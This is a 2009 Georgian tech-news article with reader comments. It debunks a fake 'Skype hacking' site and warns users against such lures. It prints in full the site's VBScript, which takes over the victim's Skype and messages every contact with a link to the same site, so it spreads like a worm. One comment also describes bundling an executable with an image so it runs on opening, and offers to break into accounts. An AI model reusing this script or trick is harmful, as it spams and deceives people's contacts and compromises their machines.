მთავარი  |    ფორუმი  |    FAQ  |    წესები  |    რეკლამა ჩვენთან  |    კონტაქტი  |    რუქა






ადგილმდებარეობა  მთავარი » სიახლეები » Soft News
როგორ გავტეხოთ სკაიპი 7 წამში
როგორ გავტეხოთ სკაიპი 7 წამში

შევთანხმდეთ - ყველას გვაქვს სკაიპი. კომუნიკაციის ეს საშუალება იმდენად მოედო საქართველოს, რომ სერიოზულ, ბიზნეს სექტორშიც შეაღწია, რაღა სალაპარაკოა თინეიჯერები, გაცნობის შემდეგ ზოგი ტელეფონის ნომრამდე სკაიპის სახელს უცვლის ხოლმე ახალგაცნობილს. სკაიპით ბევრი პირადი ინფორმაცია მიმოიცვლება და რაა ვინმეს მეგობართან გახუმრებაზე მარტივი, თუ ამ ვინმეს სკაიპის სახელი და პაროლი როგორღაც ხელში ჩაგივარდათ? მოკლედ, შევთანხმდეთ, სკაიპის "გატეხვის", ანუ როგორმე სხვის სამომხმარებლო ანგარიშში შეღწევის თემა დღეს კომპის ანა-ბანას უცოდინარ ახალგაზრდებში ძალიან აქტუალურია.



უნდა ვაღიარო, სათაური უბრალოდ სატყუარა იყო, ახლა სკაიპის გატეხვა კი არ გვინდა გასწავლოთ (რაც ნამდვილად შეუძლებელია, თუ სარკეში ჩახედვისას ამ ადამიანს არ ხედავთ ხოლმე), არამედ ვეცდებით საბაზო თავდაცვაზე მიგითითოთ, რათა სხვისი სკაიპის გატეხვის მცდელობისას თქვენი "შემთხვევით" სკაიპის პაროლი არ ჩააბაროთ ვინმეს.

ერთზე წინდაწინ შევთანხმდეთ - სკაიპის გატეხვა შეუძლებელია. ყოველ შემთხვევაში, ჩვენთვის, უბრალო მოკვდავებისთვის ეს ასეა. პირველ რიგში, როცა ვინმე ალალად სკაიპის გამტეხ პროგრამას შემოგთავაზებს, უნდა დაფიქრდეთ, ხომ არ გატყუებენ?

ასეთი ტყუილის ამოცნობა ძალიან მარტივია: თუ გატეხვის პროცესში თქვენი სახელის და პაროლის შეყვანაა საჭირო, ესე იგი, თქვენ უბრალოდ გატყუებენ, შეგაყვანინებენ თქვენს პაროლს და შემდეგ გეტყვიან, "მოხდა შეცდომა, თავიდან სცადეთ", "თქვენ მოტყუვდით, გმადლობთ!" ან საერთოდ არაფერს გეტყვიან და რამდენიმე საათში შეამჩნევთ, რომ თქვენს სკაიპში რაღაც უცნაური ამბები ხდება. ასევე ტყუილია პროგრამა, რომელიც რამენაირად თქვენი სკაიპის გამოყენებას ითხოვს (თავისუფლად შესაძლებელია, მან თქვენს კონტაქტებს თქვენი სახელით სარეკლამო მესიჯები დაუგზავნოს).

და მივადექით იმ ამბავს, რომელმაც გვიკარნახა ამ საკითხზე დაწერა, სულ ცოტა ხნის წინ გავრცელდა ახალი საიტი, რომელიც ყოვლად უანგაროდ სკაიპის გატეხვის ინსტრუქციებს გვასწავლის. მოდით, მივყვეთ ნელ-ნელა და ვნახოთ, მართალია თუ არა ეს ამბავი (მინიშნება: რა თქმა უნდა, არა!).

პირველ რიგში, საიტის მისამართია skype-hack.ucoz.net. ანუ საიტი განთავზებულია ucoz.net-ზე, ბავშვების და ვითომ-ჰაკერების საყვარელ უფასო ჰოსტინგზე, უკვე საეჭვოა. კარგი, შევიდეთ (იქამდე ვრწმუნდებით, რომ ჩვენი ანტივირი მუშაობს, დაცვის გარეშე შეიძლება საიტიდანაც კი აიკიდოთ ვირუსი), დაგვხვდება წარწერა დიიიდი წითელი ასოებით:

გინდა შენ მეგობარს გაუტეხო SKYPE მაშინ გადმოცერე ეს პროგრამა ახსნა სურატზეა და რო გადმოცერ და როგორც ახსნა სურათზეა

ჯანდაბას, იქნებ სულით ჰაკერია ადამიანი და გრამატიკა დიდად არ ეხატება გულზე, ამით პროგრამის ავ-კარგიანობის განსჯა არ გამოვა, განვაგრძოთ და შევხედოთ სურათს, რომელიც წარმოადგენს გამტეხი პროგრამის მოხმარების ინსტრუქციებს:

Skype Hack

კარგი, თავი დავანებოთ იმასაც, რომ ინსტრუქციები ტრანსლიტითაა (ინგლისური ანბანის ასოებით) დაწერილი, ხომ არ გეცნობათ სცენარი? ინსტრუქცია გვთავაზობს, რომ "გამტეხ" პროგრამას ჩვენს სკაიპთან წვდომა გავუხსნათ!

დასკვნების გამოტანა თქვენთვის მომინდია, თუ მაინც ვერ დარწმუნდით, შეგვიძლია შევხედოთ იმ .vbs (Visual Basic-ის სკრიპტი) ფაილის  შიგთავსს, რომელიც, საიტის აზრით, სკაიპს უნდა ტეხდეს:

on error resume next
set Skype = Wscript.CreateObject("Skype4COM.Skype", "Skype ")
Skype.Client.Start()
Skype.Attach()
For Each User In Skype.Friends
Skype.SendMessage User.handle," Saitzea Kvelaperi Axsnili"
Skype.SendMessage User.handle," Ginda Shen Megobars Gautexo Skype "
Skype.SendMessage User.handle," Mashin Shemo "
Skype.SendMessage User.handle," http://skype-hack.ucoz.net"
Skype.SendMessage User.handle," Martla Mushaobs "
next

მოკლედ, პროგრამა თქვენი სახელით თქვენს ყველა კონტაქტს დაუგზავის შეტყობინებას ამ საოცარი საიტის შესახებ და შესთავაზებს სკაიპის გატეხვას, თქვენი მეგობრები შევლენ ამ საიტზე, გადმოწერენ პროგრამას და ის ახლა მათ კონტაქტებს დაუგზავნის თავის მისამართს და ასე შემდეგ ...

თუმცა სკრიპტი მეტს არაფერს აკეთებს, უბრალოდ აწუხებს და ატყუებს მსხვერპლს, ასე რომ, უბრალო ხუმრობის (ან სისულელის) კატეგორიაში გადის. ასეთ სატყუარებზე გამოცდილი მომხმარებლები უბრალოდ იციანიან და თავის საქმეს აგრძელებენ, გამოუცდელებს კი, იმედია, დღეიდან მაინც გეცოდინებათ, რომ ყველა ასეთი შემოთავაზება ტყუილია და თქვენს პირად უსაფრთხოებას ეჭვქვეშ არ დააყენებთ - ვინ იცის, ყველა "გამტეხი" პროგრამას აქ მოხსენიებულივით ლმობიერი არ აღმოჩნდეს და თქვენი სკაიპის პაროლი (და სხვა პირადი ინფორმაციაც) თავის შემქმნელს მიუცუნცულოს, ან მთელი დისკი დაგიფორმატოთ და ა.შ.



ბეჭდვითი ვერსიაბეჭდვითი ვერსია | 28-06-2009, 21:22:00 | domen
   
თემატური სიახლეები

სტატიის შეფასება
ეს გვერდი უკვე შეაფასეს!

შეფასება: 3
შეფასება: 1.3


გამოხმაურება

xt spy სრულიათ აკმაყოფილებს ჩემ მოთხოვნებს და დზალით ხაკერებზე რა მოგახსენოთ უბრალოთ ვაკერებთ ქვემოთ მოხსენიებულ პროგრამას exe file - ს თუგინც სურატს ავტომატურათ რომ გაეშვას გახსნისას და დანარჩენი (დელა ტეხნიკი) სკოლკა ია ზარეზალ სკოლკა პერერეზალ :) ეს ისე ხუმრობისთის ისე თუ გინდათ ვინმეს გაუტეხო მიტხარით ან შემთხვევით თქვენიც მივატეხო მთავარია ლოგიკა და სწორი მიდგომა საკიტხთან შეიდზლება სანაგვე ყუთში მოიდზიო ის რაც პაროლის გატეხვაში დაგეხმარება ნამდვილ სანაგვე ყუთში კომპის არა ლოგიკა და და კიდე ერთხელ ლოგიკა და კიდე ჩატლახბა
06-02-2010, 11:12:43 | tasho

სკაიპის პარლისკენ გზა რომ ლამერების ტვინზე გადის მაგას ბაზარი არ უნდა მარა რა ვუყოთ რომ აქაური თინეიჯერობის 99.9% მარტო ლამერი კი არა პახოდუ ისეთი დუბინაა რო არც კი გიჯერებენ როცა უებნები რო ეგეთი რამე ტრუხაა და ამაყად არ იღებენ JPG ფაილებს რადგან თავს "ვირუსებისგან" იცავენ როცა ერთი ეგეთის FLASH რო ნახო ვირების, ჯორების, ჭია-ღუის და კიდე სხვა ეგზოტიკური "სასტავის" მთელ იერარქიას აღმოაჩენთ
01-07-2009, 20:37:28 | Delphi

NetDevil, არაფერი, წაიმარიაჟებს ცოტას მეგობრებში და იქნებ გოგოებთანაც :-)
30-06-2009, 18:25:36 | domen

რა იყო მეტი ვერაფერი მოიფიქრეს?! ეს რა ჯიშის სპამია, არც რეკლამაა და არც ანტირეკლამა არც ვირუსი და არც არაფერი...

აზრი?!
30-06-2009, 13:27:49 | NetDevil

ლოლ...

ამის წერას ჯობია დაფიქრდე რა შეიძლება იყოს შეუძლებელი, ბევრი იკითხო და "კომპს" თუ მარტო სკაიპისთვის არ იხმარ მიხვდები რო მოკვდავსაც შეგიძლია მრავალი გზა მონახო თუნდაც იმის თუ როგორ გატეხო სკაიპი....
30-06-2009, 12:16:53 | skinner

Gio_kiborg, ბევრი, ეგაა ჩვენი უბედურება :D
29-06-2009, 21:13:52 | domen

ეგ კიდე არაფერი, ბევრ მოტყუვდება, მაგრამ არ შეგხვედრიათ Yahoo მესინჯერის "გამტეხავები?"
ინსტრუქციაში ეწერათ მისამართი@yahoo.com-ზე გადმოაგზავნეთ თქვენი მეილიდან გასატეხის ID და უსაფრთხოებისთვის თქვენი მეილის კოდიო
რამდენი გაუგზავნიდა თქვენი აზრით?
29-06-2009, 15:04:21 | Gio_kiborg

domen

საღოლ, მაგარ სტატიებს წერ ხოლმე :)
29-06-2009, 12:22:04 | Chacha

მ. მ. (მერე მინაწერი (c) Sh@ko)
ამ საიტის გაპოპულარება რაშI აწყობს ავტორს?!
მგონი სადმე ბლოგზე ვიხილავთ რამედენმა ადამინმა გადაწერა, თუ არა?!
28-06-2009, 23:38:06 | otosaxel

კაი ხანია მაგის შესახებ ვიცი და გულიანადაც ვიცინე :d

ძაან რო მოინდომო მაგ Vbs სკრიპტით პაროლს ვერანაირად ვერ მოტეხავ თუ არ აქვს სადმე ჩასაწერი ველი და მერე სერვერზე არ მიდის.
28-06-2009, 23:36:43 | classical

კომენტარის დატოვება
თქვენ არ შეგიძლიათ კომენტარების დატოვება.